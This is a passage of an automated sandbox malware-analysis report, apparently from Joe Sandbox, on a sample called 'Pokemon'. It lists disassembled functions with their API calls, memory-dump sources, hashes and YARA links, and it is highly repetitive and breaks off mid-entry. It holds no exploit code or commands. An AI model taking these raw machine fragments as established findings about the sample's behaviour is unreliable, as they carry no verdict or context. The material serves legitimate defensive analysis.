                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                      • Opcode ID: a535187e6ff3040b97b150e5df13d31ecbf8233faac3747f355ac62c5ab5f142
                                                                                                                                                                                                                                                                                      • Instruction ID: e8ff63590c6aa858270b610afb32c72e2deaf08adb84ce5b4ae35d60cb769ed5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a535187e6ff3040b97b150e5df13d31ecbf8233faac3747f355ac62c5ab5f142
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F216D7050030AAFDB318F64DC05B9A77A8BF59760F204A19FCE5E72D0DBB0A851DB50
                                                                                                                                                                                                                                                                                      Function 00100F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00100F6D
                                                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00100FA8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                      • Opcode ID: 62ccdfd8b9691f385e4b8bad25b8441716acabc468a418fc8b50cb6035776920
                                                                                                                                                                                                                                                                                      • Instruction ID: 95c5495b3cd06e3585f15c27f1cace4ed10105bfc8bce30836d702b1bb134288
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62ccdfd8b9691f385e4b8bad25b8441716acabc468a418fc8b50cb6035776920
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19218E71600346FFDB309F68DC04A9A77A8BF59720F200A19F8E1E32D4DBB59991DB50
                                                                                                                                                                                                                                                                                      Function 00124B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000978B1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097873: GetStockObject.GDI32(00000011), ref: 000978C5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097873: SendMessageW.USER32(00000000,00000030,00000000), ref: 000978CF
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00124BB0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00124BBD
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00124BC8
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00124BD7
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00124BE3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                      • Opcode ID: 26ec28788799795a0842c9364997bb68b04041e7d191ea542e9512c10375e3fd
                                                                                                                                                                                                                                                                                      • Instruction ID: 5a7c98bfe01010153d12410e32f1962894e0ee79e8adffe798ac30aa00d3edd1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26ec28788799795a0842c9364997bb68b04041e7d191ea542e9512c10375e3fd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D1193B2150219BFEF118E64DC85EE77FADEF08798F014110FA18A6050CB72DC619BA0
                                                                                                                                                                                                                                                                                      Function 000CDB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000CDB23: _free.LIBCMT ref: 000CDB4C
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDBAD
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4), ref: 000C2D4E
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: GetLastError.KERNEL32(00161DC4,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4,00161DC4), ref: 000C2D60
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDBB8
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDBC3
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDC17
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDC22
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDC2D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CDC38
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                      • Instruction ID: 0b905019390ac4c2fcacedc262cb64f033803867bc1a429a47aa0c8bbaef556a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4110A72541B04EAD624FBB0CC47FCF77ECAF14700F414C2EB29AAA663DB65B9448651
                                                                                                                                                                                                                                                                                      Function 000FE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 000FE328
                                                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 000FE32F
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000FE345
                                                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 000FE34C
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000FE390
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 000FE36D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                      • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                      • Opcode ID: 17d60b5edc12d4046b83b884a1791cecf97cc612cde9f5808c06e4622c3ceb01
                                                                                                                                                                                                                                                                                      • Instruction ID: eb49f01bcb24d13f9fb40383af1cfad3389a0a96ac1ab0cbf4c18c5f9ada318c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17d60b5edc12d4046b83b884a1791cecf97cc612cde9f5808c06e4622c3ceb01
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD0162F2900208BFE72197A4ED89EFB776CD708301F004591B70AE6451E6749E958B71
                                                                                                                                                                                                                                                                                      Function 00101312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00101322
                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000,?), ref: 00101334
                                                                                                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00101342
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00101350
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0010135F
                                                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0010136F
                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 00101376
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 96d54c872e7af1c4234460e8d361e0d3bbb6846fd619a156d02298821561b146
                                                                                                                                                                                                                                                                                      • Instruction ID: 4e97b3502cb053482036776196486b7f4006050b41d4112648e8d09841ac9a1d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96d54c872e7af1c4234460e8d361e0d3bbb6846fd619a156d02298821561b146
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9F0C932042612FFD7615B54FE49BD6BB39BF04312F402121F10295CA0877494B2CF90
                                                                                                                                                                                                                                                                                      Function 001126BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0011281D
                                                                                                                                                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0011283E
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 0011284F
                                                                                                                                                                                                                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00112938
                                                                                                                                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 001128E9
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F433E: _strlen.LIBCMT ref: 000F4348
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0010F669), ref: 00113C9D
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00112992
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a55febe89c755c5a9e6877cb03aa1f55039b6e027a9289bf608f4424fe783431
                                                                                                                                                                                                                                                                                      • Instruction ID: 533a776ff48290dd9cb9d0fbaa13c632e9420ede031223be0f396e839731df6d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a55febe89c755c5a9e6877cb03aa1f55039b6e027a9289bf608f4424fe783431
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12B1E031604300AFD728DF24D885EAABBE5AF95318F54855CF4564B2E3DB31ED82CB91
                                                                                                                                                                                                                                                                                      Function 000C0527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 000C042A
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C0446
                                                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 000C045D
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C047B
                                                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 000C0492
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C04B0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                      • Instruction ID: da3a97833135c7ed3163faa800c2a1c9a7d4f18dea1dd12a11d5e1d5e3d4a8d7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1881A272A00706EBE724AF69CC82FAF73E9AF54724F24412EF515D6682E770DA00C794
                                                                                                                                                                                                                                                                                      Function 000C6571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000B8649,000B8649,?,?,?,000C67C2,00000001,00000001,8BE85006), ref: 000C65CB
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000C67C2,00000001,00000001,8BE85006,?,?,?), ref: 000C6651
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000C674B
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000C6758
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000B6A79,?,0000015D,?,?,?,?,000B85B0,000000FF,00000000,?,?), ref: 000C3BC5
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000C6761
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000C6786
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9a50fe962449b9b554a185c5493799a4220b230fab13b28eb8ee040430072257
                                                                                                                                                                                                                                                                                      • Instruction ID: 9f6c99c8924ba808bb9f8307e85f5958a8fe709848d823c77ad91a9a1345c444
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a50fe962449b9b554a185c5493799a4220b230fab13b28eb8ee040430072257
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF51ECB2614206ABEB358F60CC85FBF77AAEF40714F244B6DF809D6141EB36DC5086A0
                                                                                                                                                                                                                                                                                      Function 0011C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011C10E,?,?), ref: 0011D415
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D451
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4FE
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011C72A
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0011C785
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011C7CA
                                                                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0011C7F9
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0011C853
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0011C85F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                      • Opcode ID: eae93e7213b909c6a01ef5a18913f2a4688576351be3f67055808e5e0e35b40c
                                                                                                                                                                                                                                                                                      • Instruction ID: ccabc5009b866044a49b720850822de01d5cd3289d7929e354f1087b31d6b00b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eae93e7213b909c6a01ef5a18913f2a4688576351be3f67055808e5e0e35b40c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A281B271108341AFD718DF24C885EAABBE5FF84308F14856CF4554B2A2DB71ED86DB92
                                                                                                                                                                                                                                                                                      Function 000F009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000035), ref: 000F00A9
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 000F0150
                                                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(000F0354,00000000), ref: 000F0179
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(000F0354), ref: 000F019D
                                                                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(000F0354,00000000), ref: 000F01A1
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000F01AB
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
